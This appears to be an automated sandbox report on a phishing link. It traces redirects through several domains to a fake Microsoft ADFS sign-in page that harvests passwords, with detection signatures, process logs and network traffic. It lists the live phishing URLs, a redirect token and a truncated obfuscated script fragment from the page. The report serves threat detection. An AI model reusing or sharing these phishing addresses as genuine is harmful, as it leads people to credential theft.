Create Interactive Tour

Windows Analysis Report
https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

Overview

General Information

Sample URL:https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
Analysis ID:1648503
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
Creates files inside the system directory
Deletes files inside the Windows folder
Detected hidden input values containing email addresses (often used in phishing pages)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 1132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.10..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    2.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown' due to its global recognition and presence., The URL 'rutaann.com' does not match the legitimate domain 'microsoft.com'., There is no known association between 'rutaann.com' and Microsoft., The URL does not contain any recognizable elements related to Microsoft, which is suspicious., The presence of input fields like 'Password' and 'Sign in with PIN or smartcard' on a non-Microsoft domain is a common phishing tactic. DOM: 4.8.pages.csv
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'rutaann.com' does not match the legitimate domain 'microsoft.com'., There is no direct association between 'rutaann.com' and Microsoft., The URL does not contain any recognizable elements related to Microsoft., The email input field uses a Microsoft domain, which could be an attempt to phish Microsoft credentials. DOM: 4.9.pages.csv
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'rutaann.com' does not match the legitimate domain for Microsoft., The URL 'rutaann.com' does not contain any recognizable association with Microsoft., The presence of a password input field on a non-legitimate domain is suspicious. DOM: 5.10.pages.csv
      Source: Yara matchFile source: 2.10..script.csv, type: HTML
      Source: Yara matchFile source: 2.7.pages.csv, type: HTML
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: john.smith@microsoft.com
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: Number of links: 0
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: Number of links: 0
      Source: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comHTTP Parser: Base64 decoded: 1742934565.000000
      Source: https://rutaann.com/?qrc=john.smith%40microsoft.comHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequestHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequestHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequestHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: Title: MOD-mgoumsml does not match URL
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: Title: MOD-ec2jorvx does not match URL
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: <input type="password" .../> found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: <input type="password" .../> found
      Source: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comHTTP Parser: No favicon
      Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.comHTTP Parser: No favicon
      Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.comHTTP Parser: No favicon
      Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.comHTTP Parser: No favicon
      Source: https://rutaann.com/?qrc=john.smith%40microsoft.comHTTP Parser: No favicon
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No favicon
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No favicon
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No favicon
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="author".. found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="author".. found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="author".. found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="copyright".. found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="copyright".. found
      Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.4:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.192.251:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49802 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: sso.ninerscorretora.com.br to https://rutaann.com/?dataxx0=eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyj1cmwioijodhrwczovl3j1dgfhbm4uy29tlyisimrvbwfpbii6inj1dgfhbm4uy29tiiwia2v5ijoialldumtvczlrnvowiiwicxjjijoiam9obi5zbwl0aebtawnyb3nvznquy29tiiwiawf0ijoxnzqyotm0ntg1lcjlehaioje3ndi5mzq3mdv9.7w_s5qzwuu25mo-cbj3uwxvuas65kzepzmklv62cljs
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
